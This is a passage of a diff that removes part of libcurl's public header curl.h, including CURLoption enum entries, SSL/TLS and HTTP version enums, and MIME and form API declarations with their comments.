-  CINIT(SSH_PRIVATE_KEYFILE, STRINGPOINT, 153),
-
-  /* Send CCC (Clear Command Channel) after authentication */
-  CINIT(FTP_SSL_CCC, LONG, 154),
-
-  /* Same as TIMEOUT and CONNECTTIMEOUT, but with ms resolution */
-  CINIT(TIMEOUT_MS, LONG, 155),
-  CINIT(CONNECTTIMEOUT_MS, LONG, 156),
-
-  /* set to zero to disable the libcurl's decoding and thus pass the raw body
-     data to the application even when it is encoded/compressed */
-  CINIT(HTTP_TRANSFER_DECODING, LONG, 157),
-  CINIT(HTTP_CONTENT_DECODING, LONG, 158),
-
-  /* Permission used when creating new files and directories on the remote
-     server for protocols that support it, SFTP/SCP/FILE */
-  CINIT(NEW_FILE_PERMS, LONG, 159),
-  CINIT(NEW_DIRECTORY_PERMS, LONG, 160),
-
-  /* Set the behaviour of POST when redirecting. Values must be set to one
-     of CURL_REDIR* defines below. This used to be called CURLOPT_POST301 */
-  CINIT(POSTREDIR, LONG, 161),
-
-  /* used by scp/sftp to verify the host's public key */
-  CINIT(SSH_HOST_PUBLIC_KEY_MD5, STRINGPOINT, 162),
-
-  /* Callback function for opening socket (instead of socket(2)). Optionally,
-     callback is able change the address or refuse to connect returning
-     CURL_SOCKET_BAD.  The callback should have type
-     curl_opensocket_callback */
-  CINIT(OPENSOCKETFUNCTION, FUNCTIONPOINT, 163),
-  CINIT(OPENSOCKETDATA, OBJECTPOINT, 164),
-
-  /* POST volatile input fields. */
-  CINIT(COPYPOSTFIELDS, OBJECTPOINT, 165),
-
-  /* set transfer mode (;type=<a|i>) when doing FTP via an HTTP proxy */
-  CINIT(PROXY_TRANSFER_MODE, LONG, 166),
-
-  /* Callback function for seeking in the input stream */
-  CINIT(SEEKFUNCTION, FUNCTIONPOINT, 167),
-  CINIT(SEEKDATA, OBJECTPOINT, 168),
-
-  /* CRL file */
-  CINIT(CRLFILE, STRINGPOINT, 169),
-
-  /* Issuer certificate */
-  CINIT(ISSUERCERT, STRINGPOINT, 170),
-
-  /* (IPv6) Address scope */
-  CINIT(ADDRESS_SCOPE, LONG, 171),
-
-  /* Collect certificate chain info and allow it to get retrievable with
-     CURLINFO_CERTINFO after the transfer is complete. */
-  CINIT(CERTINFO, LONG, 172),
-
-  /* "name" and "pwd" to use when fetching. */
-  CINIT(USERNAME, STRINGPOINT, 173),
-  CINIT(PASSWORD, STRINGPOINT, 174),
-
-    /* "name" and "pwd" to use with Proxy when fetching. */
-  CINIT(PROXYUSERNAME, STRINGPOINT, 175),
-  CINIT(PROXYPASSWORD, STRINGPOINT, 176),
-
-  /* Comma separated list of hostnames defining no-proxy zones. These should
-     match both hostnames directly, and hostnames within a domain. For
-     example, local.com will match local.com and www.local.com, but NOT
-     notlocal.com or www.notlocal.com. For compatibility with other
-     implementations of this, .local.com will be considered to be the same as
-     local.com. A single * is the only valid wildcard, and effectively
-     disables the use of proxy. */
-  CINIT(NOPROXY, STRINGPOINT, 177),
-
-  /* block size for TFTP transfers */
-  CINIT(TFTP_BLKSIZE, LONG, 178),
-
-  /* Socks Service */
-  CINIT(SOCKS5_GSSAPI_SERVICE, STRINGPOINT, 179), /* DEPRECATED, do not use! */
-
-  /* Socks Service */
-  CINIT(SOCKS5_GSSAPI_NEC, LONG, 180),
-
-  /* set the bitmask for the protocols that are allowed to be used for the
-     transfer, which thus helps the app which takes URLs from users or other
-     external inputs and want to restrict what protocol(s) to deal
-     with. Defaults to CURLPROTO_ALL. */
-  CINIT(PROTOCOLS, LONG, 181),
-
-  /* set the bitmask for the protocols that libcurl is allowed to follow to,
-     as a subset of the CURLOPT_PROTOCOLS ones. That means the protocol needs
-     to be set in both bitmasks to be allowed to get redirected to. Defaults
-     to all protocols except FILE and SCP. */
-  CINIT(REDIR_PROTOCOLS, LONG, 182),
-
-  /* set the SSH knownhost file name to use */
-  CINIT(SSH_KNOWNHOSTS, STRINGPOINT, 183),
-
-  /* set the SSH host key callback, must point to a curl_sshkeycallback
-     function */
-  CINIT(SSH_KEYFUNCTION, FUNCTIONPOINT, 184),
-
-  /* set the SSH host key callback custom pointer */
-  CINIT(SSH_KEYDATA, OBJECTPOINT, 185),
-
-  /* set the SMTP mail originator */
-  CINIT(MAIL_FROM, STRINGPOINT, 186),
-
-  /* set the list of SMTP mail receiver(s) */
-  CINIT(MAIL_RCPT, OBJECTPOINT, 187),
-
-  /* FTP: send PRET before PASV */
-  CINIT(FTP_USE_PRET, LONG, 188),
-
-  /* RTSP request method (OPTIONS, SETUP, PLAY, etc...) */
-  CINIT(RTSP_REQUEST, LONG, 189),
-
-  /* The RTSP session identifier */
-  CINIT(RTSP_SESSION_ID, STRINGPOINT, 190),
-
-  /* The RTSP stream URI */
-  CINIT(RTSP_STREAM_URI, STRINGPOINT, 191),
-
-  /* The Transport: header to use in RTSP requests */
-  CINIT(RTSP_TRANSPORT, STRINGPOINT, 192),
-
-  /* Manually initialize the client RTSP CSeq for this handle */
-  CINIT(RTSP_CLIENT_CSEQ, LONG, 193),
-
-  /* Manually initialize the server RTSP CSeq for this handle */
-  CINIT(RTSP_SERVER_CSEQ, LONG, 194),
-
-  /* The stream to pass to INTERLEAVEFUNCTION. */
-  CINIT(INTERLEAVEDATA, OBJECTPOINT, 195),
-
-  /* Let the application define a custom write method for RTP data */
-  CINIT(INTERLEAVEFUNCTION, FUNCTIONPOINT, 196),
-
-  /* Turn on wildcard matching */
-  CINIT(WILDCARDMATCH, LONG, 197),
-
-  /* Directory matching callback called before downloading of an
-     individual file (chunk) started */
-  CINIT(CHUNK_BGN_FUNCTION, FUNCTIONPOINT, 198),
-
-  /* Directory matching callback called after the file (chunk)
-     was downloaded, or skipped */
-  CINIT(CHUNK_END_FUNCTION, FUNCTIONPOINT, 199),
-
-  /* Change match (fnmatch-like) callback for wildcard matching */
-  CINIT(FNMATCH_FUNCTION, FUNCTIONPOINT, 200),
-
-  /* Let the application define custom chunk data pointer */
-  CINIT(CHUNK_DATA, OBJECTPOINT, 201),
-
-  /* FNMATCH_FUNCTION user pointer */
-  CINIT(FNMATCH_DATA, OBJECTPOINT, 202),
-
-  /* send linked-list of name:port:address sets */
-  CINIT(RESOLVE, OBJECTPOINT, 203),
-
-  /* Set a username for authenticated TLS */
-  CINIT(TLSAUTH_USERNAME, STRINGPOINT, 204),
-
-  /* Set a password for authenticated TLS */
-  CINIT(TLSAUTH_PASSWORD, STRINGPOINT, 205),
-
-  /* Set authentication type for authenticated TLS */
-  CINIT(TLSAUTH_TYPE, STRINGPOINT, 206),
-
-  /* Set to 1 to enable the "TE:" header in HTTP requests to ask for
-     compressed transfer-encoded responses. Set to 0 to disable the use of TE:
-     in outgoing requests. The current default is 0, but it might change in a
-     future libcurl release.
-
-     libcurl will ask for the compressed methods it knows of, and if that
-     isn't any, it will not ask for transfer-encoding at all even if this
-     option is set to 1.
-
-  */
-  CINIT(TRANSFER_ENCODING, LONG, 207),
-
-  /* Callback function for closing socket (instead of close(2)). The callback
-     should have type curl_closesocket_callback */
-  CINIT(CLOSESOCKETFUNCTION, FUNCTIONPOINT, 208),
-  CINIT(CLOSESOCKETDATA, OBJECTPOINT, 209),
-
-  /* allow GSSAPI credential delegation */
-  CINIT(GSSAPI_DELEGATION, LONG, 210),
-
-  /* Set the name servers to use for DNS resolution */
-  CINIT(DNS_SERVERS, STRINGPOINT, 211),
-
-  /* Time-out accept operations (currently for FTP only) after this amount
-     of milliseconds. */
-  CINIT(ACCEPTTIMEOUT_MS, LONG, 212),
-
-  /* Set TCP keepalive */
-  CINIT(TCP_KEEPALIVE, LONG, 213),
-
-  /* non-universal keepalive knobs (Linux, AIX, HP-UX, more) */
-  CINIT(TCP_KEEPIDLE, LONG, 214),
-  CINIT(TCP_KEEPINTVL, LONG, 215),
-
-  /* Enable/disable specific SSL features with a bitmask, see CURLSSLOPT_* */
-  CINIT(SSL_OPTIONS, LONG, 216),
-
-  /* Set the SMTP auth originator */
-  CINIT(MAIL_AUTH, STRINGPOINT, 217),
-
-  /* Enable/disable SASL initial response */
-  CINIT(SASL_IR, LONG, 218),
-
-  /* Function that will be called instead of the internal progress display
-   * function. This function should be defined as the curl_xferinfo_callback
-   * prototype defines. (Deprecates CURLOPT_PROGRESSFUNCTION) */
-  CINIT(XFERINFOFUNCTION, FUNCTIONPOINT, 219),
-
-  /* The XOAUTH2 bearer token */
-  CINIT(XOAUTH2_BEARER, STRINGPOINT, 220),
-
-  /* Set the interface string to use as outgoing network
-   * interface for DNS requests.
-   * Only supported by the c-ares DNS backend */
-  CINIT(DNS_INTERFACE, STRINGPOINT, 221),
-
-  /* Set the local IPv4 address to use for outgoing DNS requests.
-   * Only supported by the c-ares DNS backend */
-  CINIT(DNS_LOCAL_IP4, STRINGPOINT, 222),
-
-  /* Set the local IPv6 address to use for outgoing DNS requests.
-   * Only supported by the c-ares DNS backend */
-  CINIT(DNS_LOCAL_IP6, STRINGPOINT, 223),
-
-  /* Set authentication options directly */
-  CINIT(LOGIN_OPTIONS, STRINGPOINT, 224),
-
-  /* Enable/disable TLS NPN extension (http2 over ssl might fail without) */
-  CINIT(SSL_ENABLE_NPN, LONG, 225),
-
-  /* Enable/disable TLS ALPN extension (http2 over ssl might fail without) */
-  CINIT(SSL_ENABLE_ALPN, LONG, 226),
-
-  /* Time to wait for a response to a HTTP request containing an
-   * Expect: 100-continue header before sending the data anyway. */
-  CINIT(EXPECT_100_TIMEOUT_MS, LONG, 227),
-
-  /* This points to a linked list of headers used for proxy requests only,
-     struct curl_slist kind */
-  CINIT(PROXYHEADER, OBJECTPOINT, 228),
-
-  /* Pass in a bitmask of "header options" */
-  CINIT(HEADEROPT, LONG, 229),
-
-  /* The public key in DER form used to validate the peer public key
-     this option is used only if SSL_VERIFYPEER is true */
-  CINIT(PINNEDPUBLICKEY, STRINGPOINT, 230),
-
-  /* Path to Unix domain socket */
-  CINIT(UNIX_SOCKET_PATH, STRINGPOINT, 231),
-
-  /* Set if we should verify the certificate status. */
-  CINIT(SSL_VERIFYSTATUS, LONG, 232),
-
-  /* Set if we should enable TLS false start. */
-  CINIT(SSL_FALSESTART, LONG, 233),
-
-  /* Do not squash dot-dot sequences */
-  CINIT(PATH_AS_IS, LONG, 234),
-
-  /* Proxy Service Name */
-  CINIT(PROXY_SERVICE_NAME, STRINGPOINT, 235),
-
-  /* Service Name */
-  CINIT(SERVICE_NAME, STRINGPOINT, 236),
-
-  /* Wait/don't wait for pipe/mutex to clarify */
-  CINIT(PIPEWAIT, LONG, 237),
-
-  /* Set the protocol used when curl is given a URL without a protocol */
-  CINIT(DEFAULT_PROTOCOL, STRINGPOINT, 238),
-
-  /* Set stream weight, 1 - 256 (default is 16) */
-  CINIT(STREAM_WEIGHT, LONG, 239),
-
-  /* Set stream dependency on another CURL handle */
-  CINIT(STREAM_DEPENDS, OBJECTPOINT, 240),
-
-  /* Set E-xclusive stream dependency on another CURL handle */
-  CINIT(STREAM_DEPENDS_E, OBJECTPOINT, 241),
-
-  /* Do not send any tftp option requests to the server */
-  CINIT(TFTP_NO_OPTIONS, LONG, 242),
-
-  /* Linked-list of host:port:connect-to-host:connect-to-port,
-     overrides the URL's host:port (only for the network layer) */
-  CINIT(CONNECT_TO, OBJECTPOINT, 243),
-
-  /* Set TCP Fast Open */
-  CINIT(TCP_FASTOPEN, LONG, 244),
-
-  /* Continue to send data if the server responds early with an
-   * HTTP status code >= 300 */
-  CINIT(KEEP_SENDING_ON_ERROR, LONG, 245),
-
-  /* The CApath or CAfile used to validate the proxy certificate
-     this option is used only if PROXY_SSL_VERIFYPEER is true */
-  CINIT(PROXY_CAINFO, STRINGPOINT, 246),
-
-  /* The CApath directory used to validate the proxy certificate
-     this option is used only if PROXY_SSL_VERIFYPEER is true */
-  CINIT(PROXY_CAPATH, STRINGPOINT, 247),
-
-  /* Set if we should verify the proxy in ssl handshake,
-     set 1 to verify. */
-  CINIT(PROXY_SSL_VERIFYPEER, LONG, 248),
-
-  /* Set if we should verify the Common name from the proxy certificate in ssl
-   * handshake, set 1 to check existence, 2 to ensure that it matches
-   * the provided hostname. */
-  CINIT(PROXY_SSL_VERIFYHOST, LONG, 249),
-
-  /* What version to specifically try to use for proxy.
-     See CURL_SSLVERSION defines below. */
-  CINIT(PROXY_SSLVERSION, LONG, 250),
-
-  /* Set a username for authenticated TLS for proxy */
-  CINIT(PROXY_TLSAUTH_USERNAME, STRINGPOINT, 251),
-
-  /* Set a password for authenticated TLS for proxy */
-  CINIT(PROXY_TLSAUTH_PASSWORD, STRINGPOINT, 252),
-
-  /* Set authentication type for authenticated TLS for proxy */
-  CINIT(PROXY_TLSAUTH_TYPE, STRINGPOINT, 253),
-
-  /* name of the file keeping your private SSL-certificate for proxy */
-  CINIT(PROXY_SSLCERT, STRINGPOINT, 254),
-
-  /* type of the file keeping your SSL-certificate ("DER", "PEM", "ENG") for
-     proxy */
-  CINIT(PROXY_SSLCERTTYPE, STRINGPOINT, 255),
-
-  /* name of the file keeping your private SSL-key for proxy */
-  CINIT(PROXY_SSLKEY, STRINGPOINT, 256),
-
-  /* type of the file keeping your private SSL-key ("DER", "PEM", "ENG") for
-     proxy */
-  CINIT(PROXY_SSLKEYTYPE, STRINGPOINT, 257),
-
-  /* password for the SSL private key for proxy */
-  CINIT(PROXY_KEYPASSWD, STRINGPOINT, 258),
-
-  /* Specify which SSL ciphers to use for proxy */
-  CINIT(PROXY_SSL_CIPHER_LIST, STRINGPOINT, 259),
-
-  /* CRL file for proxy */
-  CINIT(PROXY_CRLFILE, STRINGPOINT, 260),
-
-  /* Enable/disable specific SSL features with a bitmask for proxy, see
-     CURLSSLOPT_* */
-  CINIT(PROXY_SSL_OPTIONS, LONG, 261),
-
-  /* Name of pre proxy to use. */
-  CINIT(PRE_PROXY, STRINGPOINT, 262),
-
-  /* The public key in DER form used to validate the proxy public key
-     this option is used only if PROXY_SSL_VERIFYPEER is true */
-  CINIT(PROXY_PINNEDPUBLICKEY, STRINGPOINT, 263),
-
-  /* Path to an abstract Unix domain socket */
-  CINIT(ABSTRACT_UNIX_SOCKET, STRINGPOINT, 264),
-
-  /* Suppress proxy CONNECT response headers from user callbacks */
-  CINIT(SUPPRESS_CONNECT_HEADERS, LONG, 265),
-
-  /* The request target, instead of extracted from the URL */
-  CINIT(REQUEST_TARGET, STRINGPOINT, 266),
-
-  /* bitmask of allowed auth methods for connections to SOCKS5 proxies */
-  CINIT(SOCKS5_AUTH, LONG, 267),
-
-  /* Enable/disable SSH compression */
-  CINIT(SSH_COMPRESSION, LONG, 268),
-
-  /* Post MIME data. */
-  CINIT(MIMEPOST, OBJECTPOINT, 269),
-
-  /* Time to use with the CURLOPT_TIMECONDITION. Specified in number of
-     seconds since 1 Jan 1970. */
-  CINIT(TIMEVALUE_LARGE, OFF_T, 270),
-
-  /* Head start in milliseconds to give happy eyeballs. */
-  CINIT(HAPPY_EYEBALLS_TIMEOUT_MS, LONG, 271),
-
-  /* Function that will be called before a resolver request is made */
-  CINIT(RESOLVER_START_FUNCTION, FUNCTIONPOINT, 272),
-
-  /* User data to pass to the resolver start callback. */
-  CINIT(RESOLVER_START_DATA, OBJECTPOINT, 273),
-
-  CURLOPT_LASTENTRY /* the last unused */
-} CURLoption;
-
-#ifndef CURL_NO_OLDIES /* define this to test if your app builds with all
-                          the obsolete stuff removed! */
-
-/* Backwards compatibility with older names */
-/* These are scheduled to disappear by 2011 */
-
-/* This was added in version 7.19.1 */
-#define CURLOPT_POST301 CURLOPT_POSTREDIR
-
-/* These are scheduled to disappear by 2009 */
-
-/* The following were added in 7.17.0 */
-#define CURLOPT_SSLKEYPASSWD CURLOPT_KEYPASSWD
-#define CURLOPT_FTPAPPEND CURLOPT_APPEND
-#define CURLOPT_FTPLISTONLY CURLOPT_DIRLISTONLY
-#define CURLOPT_FTP_SSL CURLOPT_USE_SSL
-
-/* The following were added earlier */
-
-#define CURLOPT_SSLCERTPASSWD CURLOPT_KEYPASSWD
-#define CURLOPT_KRB4LEVEL CURLOPT_KRBLEVEL
-
-#else
-/* This is set if CURL_NO_OLDIES is defined at compile-time */
-#undef CURLOPT_DNS_USE_GLOBAL_CACHE /* soon obsolete */
-#endif
-
-
-  /* Below here follows defines for the CURLOPT_IPRESOLVE option. If a host
-     name resolves addresses using more than one IP protocol version, this
-     option might be handy to force libcurl to use a specific IP version. */
-#define CURL_IPRESOLVE_WHATEVER 0 /* default, resolves addresses to all IP
-                                     versions that your system allows */
-#define CURL_IPRESOLVE_V4       1 /* resolve to IPv4 addresses */
-#define CURL_IPRESOLVE_V6       2 /* resolve to IPv6 addresses */
-
-  /* three convenient "aliases" that follow the name scheme better */
-#define CURLOPT_RTSPHEADER CURLOPT_HTTPHEADER
-
-  /* These enums are for use with the CURLOPT_HTTP_VERSION option. */
-enum {
-  CURL_HTTP_VERSION_NONE, /* setting this means we don't care, and that we'd
-                             like the library to choose the best possible
-                             for us! */
-  CURL_HTTP_VERSION_1_0,  /* please use HTTP 1.0 in the request */
-  CURL_HTTP_VERSION_1_1,  /* please use HTTP 1.1 in the request */
-  CURL_HTTP_VERSION_2_0,  /* please use HTTP 2 in the request */
-  CURL_HTTP_VERSION_2TLS, /* use version 2 for HTTPS, version 1.1 for HTTP */
-  CURL_HTTP_VERSION_2_PRIOR_KNOWLEDGE,  /* please use HTTP 2 without HTTP/1.1
-                                           Upgrade */
-
-  CURL_HTTP_VERSION_LAST /* *ILLEGAL* http version */
-};
-
-/* Convenience definition simple because the name of the version is HTTP/2 and
-   not 2.0. The 2_0 version of the enum name was set while the version was
-   still planned to be 2.0 and we stick to it for compatibility. */
-#define CURL_HTTP_VERSION_2 CURL_HTTP_VERSION_2_0
-
-/*
- * Public API enums for RTSP requests
- */
-enum {
-    CURL_RTSPREQ_NONE, /* first in list */
-    CURL_RTSPREQ_OPTIONS,
-    CURL_RTSPREQ_DESCRIBE,
-    CURL_RTSPREQ_ANNOUNCE,
-    CURL_RTSPREQ_SETUP,
-    CURL_RTSPREQ_PLAY,
-    CURL_RTSPREQ_PAUSE,
-    CURL_RTSPREQ_TEARDOWN,
-    CURL_RTSPREQ_GET_PARAMETER,
-    CURL_RTSPREQ_SET_PARAMETER,
-    CURL_RTSPREQ_RECORD,
-    CURL_RTSPREQ_RECEIVE,
-    CURL_RTSPREQ_LAST /* last in list */
-};
-
-  /* These enums are for use with the CURLOPT_NETRC option. */
-enum CURL_NETRC_OPTION {
-  CURL_NETRC_IGNORED,     /* The .netrc will never be read.
-                           * This is the default. */
-  CURL_NETRC_OPTIONAL,    /* A user:password in the URL will be preferred
-                           * to one in the .netrc. */
-  CURL_NETRC_REQUIRED,    /* A user:password in the URL will be ignored.
-                           * Unless one is set programmatically, the .netrc
-                           * will be queried. */
-  CURL_NETRC_LAST
-};
-
-enum {
-  CURL_SSLVERSION_DEFAULT,
-  CURL_SSLVERSION_TLSv1, /* TLS 1.x */
-  CURL_SSLVERSION_SSLv2,
-  CURL_SSLVERSION_SSLv3,
-  CURL_SSLVERSION_TLSv1_0,
-  CURL_SSLVERSION_TLSv1_1,
-  CURL_SSLVERSION_TLSv1_2,
-  CURL_SSLVERSION_TLSv1_3,
-
-  CURL_SSLVERSION_LAST /* never use, keep last */
-};
-
-enum {
-  CURL_SSLVERSION_MAX_NONE =     0,
-  CURL_SSLVERSION_MAX_DEFAULT =  (CURL_SSLVERSION_TLSv1   << 16),
-  CURL_SSLVERSION_MAX_TLSv1_0 =  (CURL_SSLVERSION_TLSv1_0 << 16),
-  CURL_SSLVERSION_MAX_TLSv1_1 =  (CURL_SSLVERSION_TLSv1_1 << 16),
-  CURL_SSLVERSION_MAX_TLSv1_2 =  (CURL_SSLVERSION_TLSv1_2 << 16),
-  CURL_SSLVERSION_MAX_TLSv1_3 =  (CURL_SSLVERSION_TLSv1_3 << 16),
-
-  /* never use, keep last */
-  CURL_SSLVERSION_MAX_LAST =     (CURL_SSLVERSION_LAST    << 16)
-};
-
-enum CURL_TLSAUTH {
-  CURL_TLSAUTH_NONE,
-  CURL_TLSAUTH_SRP,
-  CURL_TLSAUTH_LAST /* never use, keep last */
-};
-
-/* symbols to use with CURLOPT_POSTREDIR.
-   CURL_REDIR_POST_301, CURL_REDIR_POST_302 and CURL_REDIR_POST_303
-   can be bitwise ORed so that CURL_REDIR_POST_301 | CURL_REDIR_POST_302
-   | CURL_REDIR_POST_303 == CURL_REDIR_POST_ALL */
-
-#define CURL_REDIR_GET_ALL  0
-#define CURL_REDIR_POST_301 1
-#define CURL_REDIR_POST_302 2
-#define CURL_REDIR_POST_303 4
-#define CURL_REDIR_POST_ALL \
-    (CURL_REDIR_POST_301|CURL_REDIR_POST_302|CURL_REDIR_POST_303)
-
-typedef enum {
-  CURL_TIMECOND_NONE,
-
-  CURL_TIMECOND_IFMODSINCE,
-  CURL_TIMECOND_IFUNMODSINCE,
-  CURL_TIMECOND_LASTMOD,
-
-  CURL_TIMECOND_LAST
-} curl_TimeCond;
-
-/* Special size_t value signaling a zero-terminated string. */
-#define CURL_ZERO_TERMINATED ((size_t) -1)
-
-/* curl_strequal() and curl_strnequal() are subject for removal in a future
-   release */
-CURL_EXTERN int curl_strequal(const char *s1, const char *s2);
-CURL_EXTERN int curl_strnequal(const char *s1, const char *s2, size_t n);
-
-/* Mime/form handling support. */
-typedef struct curl_mime_s      curl_mime;      /* Mime context. */
-typedef struct curl_mimepart_s  curl_mimepart;  /* Mime part context. */
-
-/*
- * NAME curl_mime_init()
- *
- * DESCRIPTION
- *
- * Create a mime context and return its handle. The easy parameter is the
- * target handle.
- */
-CURL_EXTERN curl_mime *curl_mime_init(CURL *easy);
-
-/*
- * NAME curl_mime_free()
- *
- * DESCRIPTION
- *
- * release a mime handle and its substructures.
- */
-CURL_EXTERN void curl_mime_free(curl_mime *mime);
-
-/*
- * NAME curl_mime_addpart()
- *
- * DESCRIPTION
- *
- * Append a new empty part to the given mime context and return a handle to
- * the created part.
- */
-CURL_EXTERN curl_mimepart *curl_mime_addpart(curl_mime *mime);
-
-/*
- * NAME curl_mime_name()
- *
- * DESCRIPTION
- *
- * Set mime/form part name.
- */
-CURL_EXTERN CURLcode curl_mime_name(curl_mimepart *part, const char *name);
-
-/*
- * NAME curl_mime_filename()
- *
- * DESCRIPTION
- *
- * Set mime part remote file name.
- */
-CURL_EXTERN CURLcode curl_mime_filename(curl_mimepart *part,
-                                        const char *filename);
-
-/*
- * NAME curl_mime_type()
- *
- * DESCRIPTION
- *
- * Set mime part type.
- */
-CURL_EXTERN CURLcode curl_mime_type(curl_mimepart *part, const char *mimetype);
-
-/*
- * NAME curl_mime_encoder()
- *
- * DESCRIPTION
- *
- * Set mime data transfer encoder.
- */
-CURL_EXTERN CURLcode curl_mime_encoder(curl_mimepart *part,
-                                       const char *encoding);
-
-/*
- * NAME curl_mime_data()
- *
- * DESCRIPTION
- *
- * Set mime part data source from memory data,
- */
-CURL_EXTERN CURLcode curl_mime_data(curl_mimepart *part,
-                                    const char *data, size_t datasize);
-
-/*
- * NAME curl_mime_filedata()
- *
- * DESCRIPTION
- *
- * Set mime part data source from named file.
- */
-CURL_EXTERN CURLcode curl_mime_filedata(curl_mimepart *part,
-                                        const char *filename);
-
-/*
- * NAME curl_mime_data_cb()
- *
- * DESCRIPTION
- *
- * Set mime part data source from callback function.
- */
-CURL_EXTERN CURLcode curl_mime_data_cb(curl_mimepart *part,
-                                       curl_off_t datasize,
-                                       curl_read_callback readfunc,
-                                       curl_seek_callback seekfunc,
-                                       curl_free_callback freefunc,
-                                       void *arg);
-
-/*
- * NAME curl_mime_subparts()
- *
- * DESCRIPTION
- *
- * Set mime part data source from subparts.
- */
-CURL_EXTERN CURLcode curl_mime_subparts(curl_mimepart *part,
-                                        curl_mime *subparts);
-/*
- * NAME curl_mime_headers()
- *
- * DESCRIPTION
- *
- * Set mime part headers.
- */
-CURL_EXTERN CURLcode curl_mime_headers(curl_mimepart *part,
-                                       struct curl_slist *headers,
-                                       int take_ownership);
-
-/* Old form API. */
-/* name is uppercase CURLFORM_<name> */
-#ifdef CFINIT
-#undef CFINIT
-#endif
-
-#ifdef CURL_ISOCPP
-#define CFINIT(name) CURLFORM_ ## name
-#else
-/* The macro "##" is ISO C, we assume pre-ISO C doesn't support it. */
-#define CFINIT(name) CURLFORM_/**/name
-#endif
-
-typedef enum {
-  CFINIT(NOTHING),        /********* the first one is unused ************/
-
-  /*  */
-  CFINIT(COPYNAME),
-  CFINIT(PTRNAME),
-  CFINIT(NAMELENGTH),
-  CFINIT(COPYCONTENTS),
-  CFINIT(PTRCONTENTS),
-  CFINIT(CONTENTSLENGTH),
-  CFINIT(FILECONTENT),
-  CFINIT(ARRAY),
-  CFINIT(OBSOLETE),
-  CFINIT(FILE),
-
-  CFINIT(BUFFER),
-  CFINIT(BUFFERPTR),
-  CFINIT(BUFFERLENGTH),
-
-  CFINIT(CONTENTTYPE),
-  CFINIT(CONTENTHEADER),
-  CFINIT(FILENAME),
-  CFINIT(END),
-  CFINIT(OBSOLETE2),
-
-  CFINIT(STREAM),
-  CFINIT(CONTENTLEN), /* added in 7.46.0, provide a curl_off_t length */
-
-  CURLFORM_LASTENTRY /* the last unused */
-} CURLformoption;
-
-#undef CFINIT /* done */
-
-/* structure to be used as parameter for CURLFORM_ARRAY */
-struct curl_forms {
-  CURLformoption option;
-  const char     *value;
-};
-
-/* use this for multipart formpost building */
-/* Returns code for curl_formadd()
- *
- * Returns:
- * CURL_FORMADD_OK             on success
- * CURL_FORMADD_MEMORY         if the FormInfo allocation fails
- * CURL_FORMADD_OPTION_TWICE   if one option is given twice for one Form
- * CURL_FORMADD_NULL           if a null pointer was given for a char
- * CURL_FORMADD_MEMORY         if the allocation of a FormInfo struct failed
- * CURL_FORMADD_UNKNOWN_OPTION if an unknown option was used
- * CURL_FORMADD_INCOMPLETE     if the some FormInfo is not complete (or error)
- * CURL_FORMADD_MEMORY         if a curl_httppost struct cannot be allocated
- * CURL_FORMADD_MEMORY         if some allocation for string copying failed.
- * CURL_FORMADD_ILLEGAL_ARRAY  if an illegal option is used in an array
- *
- ***************************************************************************/
-typedef enum {
-  CURL_FORMADD_OK, /* first, no error */
-
-  CURL_FORMADD_MEMORY,
-  CURL_FORMADD_OPTION_TWICE,
-  CURL_FORMADD_NULL,
-  CURL_FORMADD_UNKNOWN_OPTION,
-  CURL_FORMADD_INCOMPLETE,
-  CURL_FORMADD_ILLEGAL_ARRAY,
-  CURL_FORMADD_DISABLED, /* libcurl was built with this disabled */
-
-  CURL_FORMADD_LAST /* last */
-} CURLFORMcode;
-
-/*
- * NAME curl_formadd()
- *
- * DESCRIPTION
- *
- * Pretty advanced function for building multi-part formposts. Each invoke
- * adds one part that together construct a full post. Then use
- * CURLOPT_HTTPPOST to send it off to libcurl.
- */
-CURL_EXTERN CURLFORMcode curl_formadd(struct curl_httppost **httppost,
-                                      struct curl_httppost **last_post,
-                                      ...);
-
-/*
- * callback function for curl_formget()
- * The void *arg pointer will be the one passed as second argument to
- *   curl_formget().
- * The character buffer passed to it must not be freed.
- * Should return the buffer length passed to it as the argument "len" on
- *   success.
- */
-typedef size_t (*curl_formget_callback)(void *arg, const char *buf,
-                                        size_t len);
-
-/*
- * NAME curl_formget()
- *
- * DESCRIPTION
- *
- * Serialize a curl_httppost struct built with curl_formadd().
- * Accepts a void pointer as second argument which will be passed to
- * the curl_formget_callback function.
- * Returns 0 on success.
- */
-CURL_EXTERN int curl_formget(struct curl_httppost *form, void *arg,
-                             curl_formget_callback append);
-/*
- * NAME curl_formfree()
- *
- * DESCRIPTION
- *
- * Free a multipart formpost previously built with curl_formadd().
- */
-CURL_EXTERN void curl_formfree(struct curl_httppost *form);
-
-/*
- * NAME curl_getenv()
- *
- * DESCRIPTION
- *
- * Returns a malloc()'ed string that MUST be curl_free()ed after usage is
- * complete. DEPRECATED - see lib/README.curlx
- */
-CURL_EXTERN char *curl_getenv(const char *variable);
-
-/*
- * NAME curl_version()
- *
- * DESCRIPTION
- *
- * Returns a static ascii string of the libcurl version.
- */
-CURL_EXTERN char *curl_version(void);
-
-/*
- * NAME curl_easy_escape()
- *
- * DESCRIPTION
- *
- * Escapes URL strings (converts all letters consider illegal in URLs to their
- * %XX versions). This function returns a new allocated string or NULL if an
- * error occurred.
- */
-CURL_EXTERN char *curl_easy_escape(CURL *handle,
-                                   const char *string,
-                                   int length);
-
-/* the previous version: */
-CURL_EXTERN char *curl_escape(const char *string,
-                              int length);
-
-
-/*
- * NAME curl_easy_unescape()
- *
- * DESCRIPTION
- *
- * Unescapes URL encoding in strings (converts all %XX codes to their 8bit
- * versions). This function returns a new allocated string or NULL if an error
- * occurred.
- * Conversion Note: On non-ASCII platforms the ASCII %XX codes are
- * converted into the host encoding.
- */
-CURL_EXTERN char *curl_easy_unescape(CURL *handle,
-                                     const char *string,
-                                     int length,
-                                     int *outlength);
-
-/* the previous version */
-CURL_EXTERN char *curl_unescape(const char *string,
-                                int length);
-
-/*
- * NAME curl_free()
- *
- * DESCRIPTION
- *
- * Provided for de-allocation in the same translation unit that did the
- * allocation. Added in libcurl 7.10
- */
-CURL_EXTERN void curl_free(void *p);
-
-/*
- * NAME curl_global_init()
- *
- * DESCRIPTION
- *
- * curl_global_init() should be invoked exactly once for each application that
- * uses libcurl and before any call of other libcurl functions.
- *
- * This function is not thread-safe!
- */
-CURL_EXTERN CURLcode curl_global_init(long flags);
-
-/*
- * NAME curl_global_init_mem()
- *
- * DESCRIPTION
- *
- * curl_global_init() or curl_global_init_mem() should be invoked exactly once
- * for each application that uses libcurl.  This function can be used to
- * initialize libcurl and set user defined memory management callback
- * functions.  Users can implement memory management routines to check for
- * memory leaks, check for mis-use of the curl library etc.  User registered
